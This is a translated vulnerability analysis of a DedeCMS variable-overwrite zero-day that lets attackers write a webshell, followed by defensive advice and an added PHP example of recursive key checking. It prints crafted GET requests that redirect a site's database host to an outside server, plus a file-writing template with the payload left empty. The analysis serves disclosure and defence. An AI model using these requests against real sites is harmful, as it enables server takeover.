Dede GetWebShell zero-day Vulnerability Analysis Report

Source: Internet
Author: User

Event Background:

Recently, many websites have been attacked. Research and analysis by the quickshield Security laboratory showed that these websites all run the DedeCMS content management system. DedeCMS has a very serious vulnerability: attackers can directly write a "one-sentence Trojan" (a minimal PHP webshell) to the server.

The root cause of the DedeCMS vulnerability is variable overwriting. By submitting variables, an attacker overwrites the global variables that configure the database connection, so that the attacked website connects back to a database the attacker specifies, reads the content the attacker placed there, and writes it directly to the attacked website. Seen as a whole, the attack is clever: it avoids the traditional modes of injection, password cracking, back-end logon and Trojan upload, and lets an attacker write a webshell into the website directory without any authorization and take control of the site, which is a serious threat.

As website administrators' security awareness grows and network security devices and module-level filtering are introduced, traditional intrusion methods are increasingly constrained. This attack shows that Web attack thinking is changing too, slowly moving from forward attacks to reverse attacks. In system attacks, reverse attacks have long existed: to bypass front-end filtering devices such as firewalls, attackers use Trojans to make the compromised machine initiate the connection to the attacker itself. Firewalls usually do not intercept connections initiated from the inside, so a series of front-end filters and obstacles can easily be bypassed.

Analysis Report:

Let's take a look at the cause of the Dede vulnerability. First, the prototype of a variable overwrite vulnerability:

VulTest.php:

    <?php
    // Define a variable the script relies on.
    $anquanbao = "imiyoo_first";

    // Register every GET parameter as a variable named after its key.
    // $$key is assigned without any check, so a GET parameter named
    // anquanbao replaces the value defined above.
    foreach ($_GET as $key => $value)
        $$key = $value;

    echo "\$anquanbao = " . $anquanbao;
    ?>

An attacker can simply submit a variable through $_GET to overwrite the defined variable. The effect is as follows:

Screenshot before the attack

Screenshot after the attack (the $anquanbao variable has been overwritten)

With this basic pattern in mind, let's look at the details of the Dede vulnerability. It lies mainly in the file /plus/mytag_js.php.

First, follow the processing flow of this code. At the start, the program obtains the $aid variable submitted by the user. If the variable has to be displayed and no cached content is available, the record is read from the database table #@_mytag, and the $tagbody that is read is written into a cache file as a Dede template.

Obviously, $aid is injectable here, but because the table is generally empty and Dede filters the submitted single quotes, on its own this is of little practical use. Combined with the variable overwrite vulnerability, however, an attacker can overwrite the connection information from the database configuration file and redirect the database connection to a database under the attacker's control, which gives complete control over the content of $tagbody. In the DedeCMS document management system, templates can embed PHP code, so the attacker can execute arbitrary PHP code and easily write a Trojan to the server.

While testing the vulnerability, we found that the code responsible for the Dede variable overwrite is in /include/common.inc.php.

Through this code, any variable in the program can be overwritten. To overwrite the variables from the database configuration file, either $mongo_dbhost or $GLOBALS['mongo_dbhost'] can be overwritten, so the following test requests can be submitted:

    mytag_js.php?_GET[mongo_dbhost]=www.2cto.com

    mytag_js.php?_GET[GLOBALS][mongo_dbhost]=www.2cto.com

However, DedeCMS does defend against such attacks; the defense only checks the key names of the submitted variables. The check is a regular expression applied to each key $_k.

But $_k is only the key of the first dimension, while Dede extracts variables recursively over every dimension, so an attacker who submits a multi-dimensional variable bypasses the check easily. To get past the regular expression and still overwrite the variable, the $_COOKIE variable comes to mind, especially since Dede also registers variables submitted through $_COOKIE. This gives the following effective attack request:

 

    mytag_js.php?_GET[_COOKIE][GLOBALS][mongo_dbhost]=www.2cto.com

This request bypasses the DedeCMS regular expression check and overwrites the $GLOBALS['mongo_dbhost'] variable.

Analysis summary:

From the analysis above, the whole attack process is now clear:

1. The attacker prepares a MySQL database in advance containing a table named #@_mytag, where #@_ is the table prefix of the database being attacked, and inserts a record into it that controls the content of $tagbody so that it writes a one-sentence Trojan. Using a Dede template, the code that writes the Trojan is as follows:

    {dede:php}
    // Open (or create) test.php in the current directory in append mode.
    $fp = @fopen("test.php", 'a');
    // Write the payload; its content is left empty in this write-up.
    @fwrite($fp, '');
    echo "OK";
    @fclose($fp);
    {/dede:php}

2. Submitting the variable overwrite request makes the site read the specified content from that table and write the Trojan into the current path.

Since many websites running DedeCMS have not yet fixed this vulnerability, no harmful attack code is published here.

Security suggestions:

Many programmers parse multi-dimensional array variables recursively when handling the variables obtained from $_GET, $_POST or $_COOKIE, but their filtering does not check the key names of every dimension. In the Dede 0day, for example, the programmer only checks the keys of two-dimensional arrays, while an attacker can easily construct a COOKIE variable by submitting a three-dimensional array. Therefore, when a program parses multi-dimensional variables, it must also effectively check the key names at every dimension.
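To make the difference concrete, here is an added example (written for this page, not DedeCMS's own code) of a request-variable registration routine with the flawed one-level key check described above placed beside a check that walks every dimension. All names in it are hypothetical (reserved_key, check_keys_one_level, check_keys_all_levels, register_all, $scope), the reserved-key pattern is assumed, and cfg_dbhost stands in for the database-host config variable that the page's translation renders as $mongo_dbhost.

```php
<?php
// Added example, not DedeCMS's code. All names are hypothetical; cfg_dbhost
// stands in for the database-host config variable. It simulates an
// application that registers request variables at every array depth and
// shows why the reserved-key check must also run at every depth.

// Keys a request must never be allowed to set (pattern assumed for the demo):
// the config-variable prefix and GLOBALS.
function reserved_key(string $key): bool {
    return (bool) preg_match('/^(cfg_|GLOBALS)/i', $key);
}

// Flawed check: inspects only first-dimension keys, like the $_k test the
// page describes. Keys nested inside array values are never seen.
function check_keys_one_level(array $input): bool {
    foreach ($input as $k => $v) {
        if (reserved_key((string) $k)) { return false; }
    }
    return true;
}

// Fixed check: walks every dimension; one reserved key anywhere fails it.
function check_keys_all_levels(array $input): bool {
    foreach ($input as $k => $v) {
        if (reserved_key((string) $k)) { return false; }
        if (is_array($v) && !check_keys_all_levels($v)) { return false; }
    }
    return true;
}

// Multi-dimensional extraction: every key at every depth becomes a variable
// in $scope, a stand-in for the ${$_k} = $_v registration in common.inc.php.
function register_all(array $input, array &$scope): void {
    foreach ($input as $k => $v) {
        $scope[$k] = $v;
        if (is_array($v)) { register_all($v, $scope); }
    }
}

// Constructed request with the shape the page describes: the top-level key
// passes the regex, the reserved keys sit two and three dimensions down.
$scope   = ['cfg_dbhost' => 'localhost'];
$request = ['_GET' => ['_COOKIE' => ['GLOBALS' => ['cfg_dbhost' => 'attacker-db.invalid']]]];

foreach (['check_keys_one_level', 'check_keys_all_levels'] as $check) {
    $s = $scope;
    if ($check($request)) { register_all($request, $s); }   // only the flawed check lets it through
    printf("%-22s cfg_dbhost=%s\n", $check, $s['cfg_dbhost']);
}
```

Run with the PHP CLI: the flawed check leaves cfg_dbhost overwritten, the fixed check rejects the request and the configured host is unchanged.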
